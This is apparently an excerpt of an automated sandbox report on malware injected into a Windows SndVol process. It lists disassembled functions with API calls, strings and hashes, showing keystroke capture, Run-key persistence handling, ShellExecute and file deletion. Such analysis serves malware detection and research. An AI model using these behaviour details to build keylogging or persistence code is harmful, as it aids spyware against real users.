                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                • String ID: [AltL]$[AltR]
                                                                • API String ID: 2738857842-2658077756
                                                                • Opcode ID: b99914e28c38a6df7d0c4dd8e7e2660e658301fcb38244262cae42baa40b951a
                                                                • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                                • Opcode Fuzzy Hash: b99914e28c38a6df7d0c4dd8e7e2660e658301fcb38244262cae42baa40b951a
                                                                • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                                APIs
                                                                • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: uD
                                                                • API String ID: 0-2547262877
                                                                • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                                • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID: !D@$open
                                                                • API String ID: 587946157-1586967515
                                                                • Opcode ID: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                                • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                                • Opcode Fuzzy Hash: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                                • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                                APIs
                                                                • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: State
                                                                • String ID: [CtrlL]$[CtrlR]
                                                                • API String ID: 1649606143-2446555240
                                                                • Opcode ID: 5066be23c52cfaa6c6245271f0373fbb1ceb4cf0ed24aba14fe9ece54d79b194
                                                                • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                                • Opcode Fuzzy Hash: 5066be23c52cfaa6c6245271f0373fbb1ceb4cf0ed24aba14fe9ece54d79b194
                                                                • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                                APIs
                                                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Init_thread_footer__onexit
                                                                • String ID: ,kG$0kG
                                                                • API String ID: 1881088180-2015055088
                                                                • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                                • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                                • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                                • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                                APIs
                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                                                                • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                                                                Strings
                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteOpenValue
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                • API String ID: 2654517830-1051519024
                                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                                                APIs
                                                                  • Part of subcall function 0538543D: __onexit.LIBCMT ref: 05385443
                                                                • __Init_thread_footer.LIBCMT ref: 05361BF6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Init_thread_footer__onexit
                                                                • String ID: ,kG$0kG
                                                                • API String ID: 1881088180-2015055088
                                                                • Opcode ID: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                                                • Instruction ID: ba4e65756ac51560269f064cb27abe31a4e6fa89c92a1ca346fc631b7c1bf21d
                                                                • Opcode Fuzzy Hash: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                                                • Instruction Fuzzy Hash: E6E02031300E209FC218B3289688DA933E6DF4A330761C16FD005D72D4DF167441CE5D
                                                                APIs
                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0535E19B,00000000,?,00000000), ref: 053646FE
                                                                • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 05364712
                                                                Strings
                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 053646FC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteOpenValue
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                • API String ID: 2654517830-1051519024
                                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                • Instruction ID: 9bf88dd53b38dc21e24b3f676ef9480d1ae568ca945b046a7932100dd51f2336
                                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                • Instruction Fuzzy Hash: 50E0C27164430CFBDF104FB1DD06FBA3B2DEB02F02F0046A8BA0692492C622CE049670
                                                                APIs
                                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteDirectoryFileRemove
                                                                • String ID: pth_unenc
                                                                • API String ID: 3325800564-4028850238
                                                                • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                                • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                                                • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                                • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                                                APIs
                                                                • DeleteFileW.KERNEL32(00000000,?,?,0535B980,0000005C,?,?,?,00000000), ref: 0535C543
                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,0535B980,0000005C,?,?,?,00000000), ref: 0535C56E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteDirectoryFileRemove
                                                                • String ID: hdF
                                                                • API String ID: 3325800564-665520524
                                                                • Opcode ID: 2e0f71548beba5a730f37ec643fdbde7cff5540ab6036cf56b22bcb1e85fbdea
                                                                • Instruction ID: 8a54fc16ccaa30f21c0455a033f87f0a0e853adb561f205eb72da1b1e6961867
                                                                • Opcode Fuzzy Hash: 2e0f71548beba5a730f37ec643fdbde7cff5540ab6036cf56b22bcb1e85fbdea
                                                                • Instruction Fuzzy Hash: 72E08C752107109BCB10AB34888CFD7339CAF01221F042D6AAC93D3511DF24DC48CA60
                                                                APIs
                                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ObjectProcessSingleTerminateWait
                                                                • String ID: pth_unenc
                                                                • API String ID: 1872346434-4028850238
                                                                • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                                                • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                                                • GetLastError.KERNEL32 ref: 00440D35
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                • String ID:
                                                                • API String ID: 1717984340-0
                                                                • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                                                • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                                                APIs
                                                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                                                • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                                                • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastRead
                                                                • String ID:
                                                                • API String ID: 4100373531-0
                                                                • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                                • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99